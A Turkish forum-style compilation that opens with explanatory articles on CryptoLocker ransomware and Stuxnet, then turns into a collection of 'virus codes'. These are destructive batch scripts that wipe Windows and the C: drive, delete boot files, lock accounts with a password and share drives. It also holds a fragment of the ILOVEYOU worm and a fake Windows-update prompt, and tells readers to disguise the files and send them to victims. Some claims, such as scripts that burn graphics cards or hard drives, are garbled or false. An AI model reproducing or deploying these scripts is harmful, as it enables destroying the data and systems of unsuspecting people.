Crypto Locker Nedir? İşlevi Nedir? FİDYECİ VİRÜS
Trojan ve Virüsler
Crypto Locker Nedir? İşlevi Nedir?
CryptoLocker nedir
CryptoLocker , Windows XP, Windows Vista, Windows 7 ve Windows 8 dahil tüm Windows sürümlerini hedefleyen Eylül 2013 başlarında yayımlanan bir ransomware programdır. Bu ransomware RSA ve AES şifreleme bir karışımını kullanarak belirli dosyaları şifrelemek olacaktır.Bu dosyalarınızı şifreleyerek tamamlandığında, bu şifresini dosyaları için 100 $ veya 300 $ ya da bir fidye göndermek isteyen bir CryptoLocker ödeme programı gösterecektir. Bu ekran aynı zamanda fidye ödemek için veya sizin şifreleme anahtarını siler ve dosyaları şifresini çözmek için herhangi bir şekilde olmaz, sen 72 saat veya 4 gün var olduğunu belirten bir zamanlayıcı gösterecektir. Bu fidye MoneyPak kuponları veya Bitcoins kullanılarak ödenmelidir. Eğer ödeme göndermek ve doğrulandıktan sonra, program şifreli dosyaların şifresini olacaktır.
CryptoLockerOrtaya çıkan yeni bir virüs dalgası önce bilgisayarlardaki dosyaları şifreliyor, ardından bu şifreyi çözmek için kullanıcıdan fidye istiyor!
Özellikle online alışverişlerin hızla arttığı bugünlerde yeni bir virüs dalgası ortaya çıktı. CryptoLocker ismini taşıyan fidyeci virüs önce bilgisayarlara kendini bulaştırıyor. Ardından bilgisayarlardaki kritik önemdeki dosyaları tespit edip bunları şifreliyor. Şifrelenen dosyayı açamayan kullanıcı ise hacker'ın eline düşüyor.
Virüs şifreyi çözme karşılığında kullanıcılardan 100 ila 300 dolar arası bir ücret talep ediyor. Ancak işi abartan virüs, internet üzerinden para akışında iz kalmaması için kullanıcılardan yeni sanal parabirimi Bitcoin de isteyebiliyor. Böylece virüs arkasından iz bırakmadan fidyesini almış oluyor; zira Bitcoin para transflerlerinin internet üzerinden takibi çok daha zor.
Ödeme için MoneyPak gibi para ödeme araçlarını kullanabilen virüs ilk olarak İngiltere'de ortaya çıktı; ardından ABD genelinde milyonlarca bilgisayara saldırdı. Türkiye'de ise henüz bu virüsle ilgili herhangi bir mağdur ortaya çıkmış değil; ancak kısa sürede CryptoLocker'ın ülkemize de ulaşması söz konusu.
Her ne kadar güçlü bir antivirüs bu virüslerin önüne geçebilse de en iyi korunma şekli elbette internet üzerinden gelen her dosyayı açmamaktan geçiyor.
Birkaç tane resim:
Cryptolocker NASIL ÇALIŞIR?
Uzmanlara göre Cryptolocker resmi görünümlü mailleri kullanmaktadır. Genellikle eksik ödemeler, vergiler, satın alımlar gibi şeyleri bildirdiklerinden kullanıcılar bu mailleri kolayca açabilmektedir. Bu eklentiler açılınca bilgisayar bu virüsten etkilenir ve kullanıcıların dosyalarını kilitler. Genellikle bu virüs şu uzantılara sahip dosyaları kilitler: 3fr, accdb, ai, arw, bay, cdr, cer, cr2, crt, crw, dbf, dcr, der, dng, doc, docm, docx, dwg, dxf, dxg, eps, erf, indd, jpe, jpg, kdc, mdb, mdf, mef, mrw, nef, nrw, odb, odm, odp, ods, odt, orf, p12, p7b, p7c, pdd, pef, pem, pfx, ppt, pptm, pptx, psd, pst, ptx, r3d, raf, raw, rtf, rw2, rwl, srf, srw, wb2, wpd, wps, xlk, xls, xlsb, xlsm, xlsx.
Eğer bilgisayarınızın bu virüsten etkilendiğini düşünüyorsanız, vakit kaybetmemeli ve aşağıdaki adımları takip etmelisiniz:
Cryptolocker’ı NASIL KALDIRABİLİRİM?
Çoğu durumda kullanıcılar dosyalarına erişimi STOPzilla, SpyHunter, Malwarebytes Anti Malware programları ile tarama yaparak ya da System Restore’u kullanarak sağlamaktadır. Sistemin kilidini kaldırmak için şu adımları takip edin:
Yani Sevgili Arkadaşlarım İnternetden Bilir Bilmedik Önümüze gelen Dosyayı İndirmiyoruz.Bilgisayarımızın Güvenliğini Hadsafada Tutuyoruz
Yoksa Böyle Virüslerle Önemli Dosyalarımızı Kaybederiz Ve Şunuda Biliyoruz ki "Son Pişmanlık Fayda etmez."
CryptoLocker , Windows XP, Windows Vista, Windows 7 ve Windows 8 dahil tüm Windows sürümlerini hedefleyen Eylül 2013 başlarında yayımlanan bir ransomware programdır. Bu ransomware RSA ve AES şifreleme bir karışımını kullanarak belirli dosyaları şifrelemek olacaktır.Bu dosyalarınızı şifreleyerek tamamlandığında, bu şifresini dosyaları için 100 $ veya 300 $ ya da bir fidye göndermek isteyen bir CryptoLocker ödeme programı gösterecektir. Bu ekran aynı zamanda fidye ödemek için veya sizin şifreleme anahtarını siler ve dosyaları şifresini çözmek için herhangi bir şekilde olmaz, sen 72 saat veya 4 gün var olduğunu belirten bir zamanlayıcı gösterecektir. Bu fidye MoneyPak kuponları veya Bitcoins kullanılarak ödenmelidir. Eğer ödeme göndermek ve doğrulandıktan sonra, program şifreli dosyaların şifresini olacaktır.
CryptoLockerOrtaya çıkan yeni bir virüs dalgası önce bilgisayarlardaki dosyaları şifreliyor, ardından bu şifreyi çözmek için kullanıcıdan fidye istiyor!
Özellikle online alışverişlerin hızla arttığı bugünlerde yeni bir virüs dalgası ortaya çıktı. CryptoLocker ismini taşıyan fidyeci virüs önce bilgisayarlara kendini bulaştırıyor. Ardından bilgisayarlardaki kritik önemdeki dosyaları tespit edip bunları şifreliyor. Şifrelenen dosyayı açamayan kullanıcı ise hacker'ın eline düşüyor.
Virüs şifreyi çözme karşılığında kullanıcılardan 100 ila 300 dolar arası bir ücret talep ediyor. Ancak işi abartan virüs, internet üzerinden para akışında iz kalmaması için kullanıcılardan yeni sanal parabirimi Bitcoin de isteyebiliyor. Böylece virüs arkasından iz bırakmadan fidyesini almış oluyor; zira Bitcoin para transflerlerinin internet üzerinden takibi çok daha zor.
Ödeme için MoneyPak gibi para ödeme araçlarını kullanabilen virüs ilk olarak İngiltere'de ortaya çıktı; ardından ABD genelinde milyonlarca bilgisayara saldırdı. Türkiye'de ise henüz bu virüsle ilgili herhangi bir mağdur ortaya çıkmış değil; ancak kısa sürede CryptoLocker'ın ülkemize de ulaşması söz konusu.
Her ne kadar güçlü bir antivirüs bu virüslerin önüne geçebilse de en iyi korunma şekli elbette internet üzerinden gelen her dosyayı açmamaktan geçiyor.
Birkaç tane resim:
 | Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın. |
| Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın. |
Cryptolocker NASIL ÇALIŞIR?
Uzmanlara göre Cryptolocker resmi görünümlü mailleri kullanmaktadır. Genellikle eksik ödemeler, vergiler, satın alımlar gibi şeyleri bildirdiklerinden kullanıcılar bu mailleri kolayca açabilmektedir. Bu eklentiler açılınca bilgisayar bu virüsten etkilenir ve kullanıcıların dosyalarını kilitler. Genellikle bu virüs şu uzantılara sahip dosyaları kilitler: 3fr, accdb, ai, arw, bay, cdr, cer, cr2, crt, crw, dbf, dcr, der, dng, doc, docm, docx, dwg, dxf, dxg, eps, erf, indd, jpe, jpg, kdc, mdb, mdf, mef, mrw, nef, nrw, odb, odm, odp, ods, odt, orf, p12, p7b, p7c, pdd, pef, pem, pfx, ppt, pptm, pptx, psd, pst, ptx, r3d, raf, raw, rtf, rw2, rwl, srf, srw, wb2, wpd, wps, xlk, xls, xlsb, xlsm, xlsx.
Eğer bilgisayarınızın bu virüsten etkilendiğini düşünüyorsanız, vakit kaybetmemeli ve aşağıdaki adımları takip etmelisiniz:
Cryptolocker’ı NASIL KALDIRABİLİRİM?
Çoğu durumda kullanıcılar dosyalarına erişimi STOPzilla, SpyHunter, Malwarebytes Anti Malware programları ile tarama yaparak ya da System Restore’u kullanarak sağlamaktadır. Sistemin kilidini kaldırmak için şu adımları takip edin:
- Virüsü devredışı bırakmak için bilgisayarınızı “Güvenli modda hızlı başlatım” da başlatın.
- Regedit’i çalıştırın.
- WinLogon Entries de explorer.exe ya da blank olmayan dosyaları bulun ve explorer.exe ile değiştirin.
- Yazdığınız dosyaların kayıt bilgilerini bulun ve silin. ,
- Tüm sisteminizde güncel bir anti-spyeare programı ile tarama yapın.
Yani Sevgili Arkadaşlarım İnternetden Bilir Bilmedik Önümüze gelen Dosyayı İndirmiyoruz.Bilgisayarımızın Güvenliğini Hadsafada Tutuyoruz
Yoksa Böyle Virüslerle Önemli Dosyalarımızı Kaybederiz Ve Şunuda Biliyoruz ki "Son Pişmanlık Fayda etmez."/ Stuxnet Virüsü hakkinda /
Bilgisayar Güvenliği
/ Stuxnet Virüsü hakkinda /
| Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın. |
Stuxnet, ABD ve İsrail'in, İran'ın nükleer çalışmalarını sekteye uğratmak için kullandığı solucan yazılımdır. Haziran 2010'da varlığı açığa çıkan virüs İran'ın Buşehr ve Natanz'daki nükleer tesislerini etkilemiştir.
Stuxnet, endüstriyel kontrol sistemlerinin ve dış dünyaya kapalı sistemlerin de hedef olabileceğini göstermesi açısından siber güvenlik konusunda önemli bir yere sahiptir. Virüsün elektrik hatları üzerinden bulaşması da projenin içinde olduğu söylenir. Fakat asıl bulaşma yolu Natanz tesislerinde çalışan bir mühendisin kişisel laptop'una bir cafedeyken ajan tarafından USB bellek ile bulaştırılmıştır.
İran'da hedef reaktörler aktif olmadığı için nükleer bir facia yaşanmamıştır. Eğer reaktörler aktif olsaydı Çernobil benzeri bir felaket olabilirdi.
Microsoft firmasına ait işletim sistemlerini etkileyen Stuxnet, İran'ın nükleer enerji tesisleri hedefliyor ve bu özelliği onun endüstriyel casusluk için geliştirildiği şüphelerini güçlendiriyor.
17 Haziran’da, Belarus menşeli bir antivirüs firması olan VirusBlokAda, şimdilerde Stuxnet olarak bilinen zararlı yazılımın, Windows sistemlerin henüz fark edilmemiş açıklarından yararlanarak bilgisayarlara sızdığını açıklamıştı. Yaklaşık bir ay kadar sonra Microsoft, yazılımın, endüstriyel otomasyon ve kontrol programlarını çalıştıran sistemleri hedef aldığını doğruladı.
VirusBlokAda’nın yayınladığı raporda, yazılımın, harici belleklerin takılıp içeriğinin görüntülenmesiyle sisteme bulaştığı bildirildi. Bu yöntem, güvenlik gerekçesiyle İnternet bağlantısı olmayan süreç kontrol ve otomasyon programları kullanan bilgisayarlar için epey uygun. Biraz daha açıklamak gerekirse, toplam boyutu neredeyse 500 KB kadar küçük olan Stuxnet, harici medyanın dosya görüntüleyici de açılırken, sistemin dosya simgelerini göstermek için kullandığı algoritmayı kullanarak sisteme sızıyor ve kendini Realtek firmasının imzalarıyla sürücü dizinine kopyalıyor. Yazılımın Realtek firmasının elektronik imzalarını nasıl ele geçirdiği konusunda henüz bir bilgi yok. VirusBlokAda’nın uyarılarına da, rapor haberinin kaleme alındığı tarih olan 19 Temmuz itibariyle Realtek tarafından resmi bir açıklama getirilmemişti.
| Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın. |
Stuxnet bugüne kadarki en karmaşık virüs!
Symantec güvenlik takımının yöneticisi Liam O. MURCHU, "Bu yazılıma harcanan kaynaklar büyüleyici. Gerçekten!" diyerek kötü amaçlı kodun ne kadar karmaşık bir yapıda olduğunu dile getiriyor. Kasperksy’de kıdemli araştırmacı olarak çalışan Roel SCHOUWENBERG ise, "Google da dâhil olmak üzere pek çok şirketin ağını etkileyen Aurora, bunun yanında çocuk oyuncağı kalır." diyerek, Murchu’ya katılıyor.
Araştırmacılar, Stuxnet’in şimdiye kadar hiçbir zararlı yazılımda görülmemiş sayıda çok sıfır gün saldırısı (4 zero day attack) diye adlandırılan bir yöntemle bulaştığını söylüyorlar. Peki, nedir bu sıfır gün saldırısı? Tam olarak tanımı, yazılımın geliştiricileri tarafından henüz farkına varılmamış ve yazılımın kullanıma sürüldüğü halindeki açıklardan faydalanan saldırılardır. Yazılımın geliştiricisi tarafından farkedildikleri ve yamanarak düzeltildikleri ana kadar kullanılabilirler. Kapalı kaynaklı yazılımlarda da, özgür yazılımlara oranla fark edilmesi ister istemez daha çok vakit alır ve sistemin güvenliğini tehdit eder. İşte Stuxnet bu şekilde, ortalama bir kötü amaçlı yazılımın bir adet açığı hedeflediği genel kabul görürken, şimdilik bilinen dört açığı kullanıyor ki bu da komplo teorisyenleri tarafından, sistemin karmaşıklığı da ele alındığında devlet destekli bir saldırı olarak yorumlanıyor.
Microsoft bahsedilen açıklardan iki tanesini, saldırıdan çok sonra, 2 Ağustos’ta yayınladığı yamayla kapadı. Geri kalan az riskli iki tanesiniyse daha sonra yayınlamayı planladığı genel bir güvenlik güncelleştirmesi ile kapayacak!
Stuxnet’in hedef aldığı programın otomasyon ve kontrol programları olduğunu söylemiştik. Şimdiye kadar bildirilen vakalar içerisinde Siemens’in kontrol sistemleri dışında sistemler kullanıp da bu yazılımdan etkilenen yok. Siemens ise Stuxnet’in 15 adet sistemine bulaştığını fakat henüz bir zarara neden olmadığını bildirdi.
| Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın. |
Stuxnet Virüsü Nasıl Çalışıyor?
Stuxnet bir bilgisayara harici bellekle bulaştıktan sonra kendini sürücü dizinine kopyalıyor ve Siemens’in WinCC ve PCS 7 adını verdiği SCADA (kontrol yönetimi ve veri toplayıcı) programlarını arıyor. Eğer bu programları bulursa kendini Siemens’in öntanımlı parolalarını kullanarak programa entegre ediyor ve kontrol mantığını, kötü amaçlı yazılımın yazarının isteği doğrultusunda değiştirecek ek modülleri programa ekleyerek değiştiriyor. Böylelikle bütün bir tesisin kontrol mekanizmasını etkiliyor.
Windows sisteminde kendini System32 içindeki dosya olan lsass.exe olarak tanıtmış ve Stuxnet bu şekilde dağıtılmıştır.
Bu tarz saldırıların boyutunu şöyle bir örnekle kafamızda canlandırabiliriz: Stuxnet’in bulaştığı bilgisayarların %60’ı İran’da olduğu için örneğimiz nükleer reaktör olsun. Diyelim ki bir nükleer reaktörün kontrol sisteminden sorumlusunuz. Reaktörün üst sıcaklık değerini 750 dereceye ayarladınız. Termoçiftiniz reaktörün sıcaklığı 750 dereceye yaklaşmaya başladığı anda, kontrol sisteminize haber verir. Bu girdiyi alan sistem, sıcaklığın düşürülmesi için gerekli adımları, içerisinde kodlanmış mantığa uygun olacak şekilde izler. Örneğin soğutma suyunun devrini hızlandırır. İşte bu noktada eğer Stuxnet kontrol adımlarını yeniden tanımlarsa, örneğin reaktör 750 dereceye geldiğinde su akışını hızlandırmak yerine yavaşlatırsa, kazalar kaçınılmaz hale gelir. Yazılım bunun gibi pek çok nedenden dolayı endüstriyel tesisler için tehlike arz ediyor.
Uzmanlar Stuxnet’in yazarının tek bir kişi olamayacağını, çünkü, sistemin veritabanından, kök takımlara, PLC algoritmalarından, Realtek’in elektronik imzalarının çalınmasına ve Siemens’in donanımına kadar her şeye vakıf tek bir kişinin olamayacağını, farklı disiplinlerde eğitim görmüş bir grup tarafından yazıldığını düşünüyor. Bu da yukarıda da belirtildiği üzere, devlet destekli bir yazılım olduğu teorilerini destekler nitelikte.
Önlemler Ne Olabilir!
Nükleer santral gibi önemli projelerde kullanacağınız işletim sistemi çok önemlidir. Bu işletim sistemi Windows alt yapılı olursa o reaktör zaten size ait değildir. Linux veya UNIX olmalıdır. Fakat dağıtımı free olan veya Debian gibi mimarisi belli olan ve onun üzerine yazılmış bir işletim sistemi olmamalıdır. Paketleri ve mimarisi özgün olan bir Linux işletim sistemi olmalıdır. Kernel üzerine sizin yazacağınız özgün bir işletim sistemi olmalıdır. Mimarisi size ait olan. Çünkü mimari alt yapısı belli olan sistemlere saldırılar ve tehditler bellidir.
Stuxnet Source Code: https://github.com/Laurelai/decompile-dump
Makine diline en yakın dil olan C programlama dili ile yazılmıştır virüs.
ARkadaşlar İşte size tüm virüs kodları Bİ teşekürü borc bilmeyin
1.Sayfa Virus Kodları
30 sn de wirüs yapın ...
Açıklama:
1.Notepad 'i açın.
2.Notepad in içine şunları yazın:
-----------------------------------------
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .:eni salak formatı yedin::.
@echo off
--------------------------------------------
3.Notepad i kapatıp belgeyi kaydedin.
4.Uzantısını .txt den .bat a çevirin.
5.Hazır.
Açıklama:
Yaptıktan sonra dosyaya sakın tıklamayın.
Eğer tıklarsanız 2,3 sn saniye içinde bilgisayar kapanıyor. ve bi daha açılmıyor.
Not:%100 ÇALIŞIYO
Windows un önemli bi kaç dosyasını siliyor ve sonra "seni salak formatı yedin yazıyor".
Peki bunu düşmanıma nasıl yediririm derseniz:
dosyanın adını değiştirin.(mesela:fifa_2005_stream_install)
--------------------------------------------------------------------------
Çalışan ve Gördüğüm en Küçük Virüs
Bu Forumda Verilip verilmediğini tam olarak bilmiyorum ama Suan elimde çok basit yazılmış bir virüs var. Kodlar Aşağıdaki gibidir. Yapmanız gereken tek şey kodları Notepad e yapıştırıp uzantısını .bat olarak ayarlamak. sonra Msn de veya başka bir paylaşım programında başkasına gönderebilirsiniz. Peki virüsümüzün zararı nedir? sorusunun cevabı ise C sürücüsündeki bazı dosyaları siliyor ve 2 sn sonra bilgisayar resetleniyor. taki bir daha açılmamak üzere artık o pc yi format paklar...
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .::Format Down Up Your Sistem Limp_buskuit::.
@echo off
--------------------------------------------------------------------------
çok basit yöntem ile 1 dk içinde virüs yapımı ve sistem çöküyoo
Çok basit yöntemlerle 1 dk içinde format atan(ve attıktan sonra bilgisayar açılmıyor) virus yapabilirsiniz.
Açıklama:
1.Notepad 'i açın.
2.Notepad in içine şunları yazın:
Kod:
@echo off C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off cls cls @echo .::Seni salak formatı yedin::. @echo off
3.Notepad i kapatıp belgeyi kaydedin.
4.Uzantısını .txt den .bat a çevirin.
5.Hazır.
Açıklama:
.
Yaptıktan sonra dosyaya sakın tıklamayın.
Eğer tıklarsanız 2,3 sn saniye içinde bilgisayar kapanıyor. ve bi daha açılmıyor.
Not:%100 ÇALIŞIYO
Windows un önemli bi kaç dosyasını siliyor ve sonra "seni salak,formatı yedin yazıyor".
Not: "seni salak,formatı yedin" yazan yere kendi mesajınızı yazabilirsiniz...
nasıl .bat yapılır??
ms-dos komut istmini aç dosya neredeyse mesela C:\virus.txt şeklindeyse aynen şunu yazıcaksın...
C:\ren virus.txt virus.bat sonra enter diyoruz..Ve bat. yaptığımız dosyayı herhangi bir şekilde karşıdakine yediriyoruz...
--------------------------------------------------------------
Ekran Karti Yakma(alinti)program Bile Değil Işimizi Yazilarla Hallediyoruz
YAPACAGINIZ İŞLEM
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .:: HacKeD gülümse ::.
@echo off3.
METİN SAYFASI AÇIP
kodlarını yapıştırın ve farklı kaydet diyin. dosya adını yazın ve sonuna .bat yazın. (örnek: açma.bat)
vede kaydedin böylece ms-dos toplu iş dosyası oluşacak bunu sakın açmayın ve kimin ekran kartını yakmak istiyorsanız o kişiye yollayın. kurban dosyaya iki kere tıkadığı zaman saniyede 1000 den fazla ms-dos sayfası açılacak vede yaklasık 30 sn sonra ekran kartı gücünü kaybedip yorulacak. en sonunda HacKeD By MaNNeR_Boi yazısı görünecek (burayı kendiniz değiştirebilirsiniz) vede görüntü gidecek. yeni ekran kartı alana kadar da gelmiyecek kolay gelsin.
-------------------------------------------------------------
Format Virüsü
bunu notepade atın .bat olarak kaydedin karşı tarafa yollayın pcsine format atılacak
cd..
cd..
attrib -s -h -r -a c:\ntldr
del c:\ntldr
shutdown -r
--------------------------------------------------------------------------
HDD yakan virüs
Arkadaşlar size verceğim kodu kişinin çalıştırına yazdırabilirseniz veye notpeda kodu yapıştırıp biçimini bat. e çeviirseniz dosyayı açtığı anda hddsi yanar işte komut
/timersecure 0 0 //mkdir $mid(C:,1,2) $+ $rand(1,99999) $+ $rand(A,Z) $+ $rand(a,z)
kolay yapmak isterseniz kurbana bunu çalıştıra yaz pc hızlanıo fln derseniz oltaya gelebilir hadi sizze kolay gelsin
--------------------------------------------------------------------------
Karşı pc ye şifre koy
bunu notepad e yapıştır 123456 yazan yere koymak istediğin şifreyi yaz .bat uzantılı olarak kaydet(örnek yun.bat) zip le sıkıştırın ve kurbana yollayın bunu açtığı zaman pc si kapanır ve şifrelenmiş olur açtığında pc şifre sorar.Eğer şifreyi koyduktan sonra pc nin kapanmasını istemiyorsanız shutdown -r kısmını silin.
Kodlar:
net user %username% 123456
shutdown -r
--------------------------------------------------------------------------
MSN de pc yi kitleme
1- öncelikle pc mizden not defteri acalım içine start yazıp kopyalayalım sonra sırasıyla yuzlerce start yazalım.
2- daha sonra kaydet diyelim ve bu dosyayı txt olarak degılde .bat olarak kaydedelim işte size pc dondurucu sakın kendı pcinizde acmayın ama denemek isteyenler açabilir.sonrada .rarlayıp gönderiyoruz karşı taraf açarsa
sonuc olarak pc de durmadan pencereler acılıyor yüzlerce reset atmak zorunda kalıyorsunuz.ekran kartını yoruyor ve yanmasına sebep oluyor.
--------------------------------------------------------------------------
***msn den pc çökertme***
Selam arkadaşlar msn den birine gıcık oluyorsanız işte buyrun.Lütfen masum arkadaşlar üzerinde denemeyin
————————————–
1.Notepad ’i açın.
2.Notepad in içine şunları yazın:
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .:: BLooDY den formatı yedin::.
@echo off
3.Notepad i kapatıp belgeyi kaydedin.
4.Uzantısını .txt den .bat a çevirin.
5.Hazır.
NOT:
Yaptıktan sonra dosyaya sakın tıklamayın.
Eğer tıklarsanız 2,3 sn saniye içinde bilgisayar kapanıyor. ve bi daha açılmıyor.
Windows un önemli bi kaç dosyasını siliyor ve sonra ” BLooDY den formatı yedin yazıyor”.
Peki bunu düşmanıma nasıl yediririm derseniz:
dosyanın adını değiştirin
--------------------------------------------------------------------------
msn patlatma %100 başarı
tek yapmanız gereken kodu arkadaşınıza yedirmek kodu kişisel iletiye yazdığı an msn si kapanıyo ve bidaha açamıyo ( denendi onaylandı )
kod:
--------------------------------------------------------------------------------
ñ¯a_Á¯aÿ±m¯a�ÁÇáç±Çáß±Çá§ÁaÇáDZOÇᯱÇ᧱Çár×ÁÇá+ÑÇ á£áÇá
--------------------------------------------------------------------------
XP SiSTeM ÇöKeRTiCi PRoGRaMsıZ::
ARKADAŞLAR AŞAGIDA VERECEĞİM KODLARI KOPYALIYORUZ.
DAHA SONRA MASA ÜSTÜNE BİR TXT DOSYASI ACIP İÇİNE YAPIŞTIRIYORUZ.
FARKLI KAYDETTEN UZANTISINI .bat OLARAK KAYDEDİYORUZ.
DAHA SONRA DOSYAYI KURBANIMIZA YOLLUYORUZ.
KURBAN DOSYAYI ACINCA
"Microsoft windows XP' nizi güncellemeye devam etmek için lutfen bir tusa basın."
ŞEKLİNDE BİR UYARI İLE KARŞILAŞAK...
PHP KODU:
echo off
echo Microsoft windows XP' nizi güncellemeye devam etmek için lutfen bir tusa basın
echo off
pause
del /f /q d:
del /f /q c:
shutdown -r
shutdown -a buda panzehiri,, eğer kendi pcnizde açarsanız 30 saniye sonra pc format atacaktır sizde bunu panzehir olarak bi yere kaydedin.. sonrada yanlışlıkla açarsanız bunu açın olay bitti
_________________
2.Sayfa Virus Kodları
BU DÜNYAYI SALLAYAN Bİ VİRÜS.EN BAŞTAN SÖYLİYEYİM KENDİ PC'NİZDE SAKIN DENEMEYİN PC'NİZ AÇILMAZ.AÇILMADIĞI GİBİ FORMAT ATTIRMANIZ LAZIM HADİFORMAT ATTINIZ.ATIKTAN SONRA BAKIN NE SORUNLAR ÇIKIYOR ***KODLAR AŞAGIDA***.[
rem delete -pcas(-vbe)
On es error -pc
On error Next Pc Hack
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Window s Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
sımdı arkadasların bazıları sorucak bu vırusu nasıl yapıcam aynen soyle yapacaksın not defterını acıyorsun buradakı kodları oraya yapıstırıyorsun sonra farklı kaydet dıyorsun masaustune (örnegın:sabo.bat) arkadaslar .bat seklınde kaydedıyorsun ve masaustunde vırusun hazır sız bu vırusu acmayın sakın ıste yapdıgınız ılk vırus dosyası da budur...!!!
3.Sayfa Virus Kodları
Pc Hack için Bi Virüs koDu
cd c:\\
attrib -s -h boot.ini
cls
attrib -s -h found.000
attrib -s -h found.001
t>boot.ini
attrib -a -s -h pagefile.sys
h>pagefile.sys
attrib -a -s -h hiberfil.sys
HH>hiberfil.sys
attrib -a -s -h -r bootfont.bin
hhh>bootfont.bin
attrib -a -s -h -r ntdetect.com
ff>ntdetect.com
attrib -a -s -h -r ntldr
f>ntldr
cls
cd..
cd..
cls
cd windows
g>win.ini
cls
g>system.ini
cls
cd pss
ft>system.ini.backup
f>win.ini.backup
cls
cd c:\\
@echo .::.HADi baslayalım.::.
cd windows
cd system32
attrib -r -h -s dllcache
cls
attrib -a -h -r *.manifest
cls
cd config
attrib -a -h *.log
cd..
cd restore
attrib -r -h -s filelist.xml
cls
cd c:\\
cls
cd windows
cls
tskill msnmsgr /a
tskill msmsgs /a
cls
del /f /q /s c:\\windows\\system32\\*.*
cls
cd repair
attrib -a -h ntuser.dat
f>ntuser.dat
ff>secstup.inf
cd..
attrib -h inf
attrib -h -s installer
attrib -h pif
attrib -r -h -a WindowsShell.Manifest
attrib -r -h şMSI31Uninstall_KB893803ş
attrib -s -a bootstat.dat
attrib -s -h services.dll
attrib -s -h qservice.exe
attrib -a -r set3.tmp
attrib -s -h winnt.bmp
attrib -s -h winnt256.bmp
cls
cd c:\\
del /f /q /s c:\\windows\\*.*
cls
cd..
cd..
cd program files
cd internet explorer
attrib -a -s -h iexplore.exe
cd c:\\
cls
del /f /q /s c:\\program files\\*.*
cls
cd..
cd..
attrib -a -h -r -s msdos.sys
attrib -a -s -h config.sys
cls
attrib -a -h -r -s IO.sys
cls
del /f /q /s c:\\*.*
cls
@echo Yuklemeyi Bitirmek Ilerlemeniz Gerekir…
@echo Veri Kayiplari Olmamasi icin….!!!!!!…
@echo Devam Etmeniz Kesinlikle Onerilir…!!!..
pause
cls
cd..
cd..
cd ********s and Settings
cd All Users
cd Desktop
md .HackEd
md Bys
md Hacker
dir /s>HAcKeD.ini
@echo HALA shutDownN.exe Pc DEYse RES iyi Gider
cls
shutdown -r -t 5 -c “HacKs FoR ” -f
shutdown -r -t 5 -c “HacKs FoR” -f
tsshutdn 5 /delay:2
tsshutdn 5 /delay:2
bunu not defterine yapıştıp farklı kaydet ten uzantısını
.bat yapın… test edilimistir
4.Sayfa Virus Kodları
Klavye Hackleme Kodu
del C:/WINDOWS/system/KEYBOARD.DRV
Karşı Pcyi Yak
90,90
resizepic 0 0 5054 405 470
gumppic 10 10 5528
gumppic <eval (10+((<p.x>*100)/1337))> <eval (10+((<p.y>*100)/1067))> 2362
text 20 400 455 0
text 20 435 455 01 local.t_x=<argn1>
local.t_y=<argn2>
sector.allclients sendpacket 0c0 00 D<var.src> D<var.target> W<var.effect> W<p.x> W<eval <p.y**** B<qval <argn3>?<argn3>:<p.z**** W<local.t_x> W<local.t_y> B<qval <argn3>?<argn3>:<p.z**** B<var.speed> B<var0.duration> 00 00 00 B<qval <var0.explode>?<var.explode>:0> D<hval <var.hue> - 1> D<var.rendermode>
System 32 Silen Virüs
Not defterinin içine yapıştır.Bata çevir.C:/windows/system32 /deleted
Karşı tarafa yolla açsın.Gitti Bitti.
Karşı Pcyi Paylaşıma Açma Kodu
Not defterine kaydet ve uzantısını bat yap.Yolla...
net share hacker=c:\ /unlimited /remark:"RockStar"
net share hacker=d:\ /unlimited /remark:"RockStar"
Karşı Pcyi Resmi Açınca Pc Kapanıyor Ve Mosuyi Kaybetme
RapidShare: 1-CLICK Web hosting - Easy Filehosting Resim
RapidShare: 1-CLICK Web hosting - Easy Filehosting Mouse
Bu dosyaları indirin ve karşı tarafa yollayın açınca o size neler olduğunu anlatır.
Format
1.Notepad 'i açın.
2.Notepad in içine şunları yazın:
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
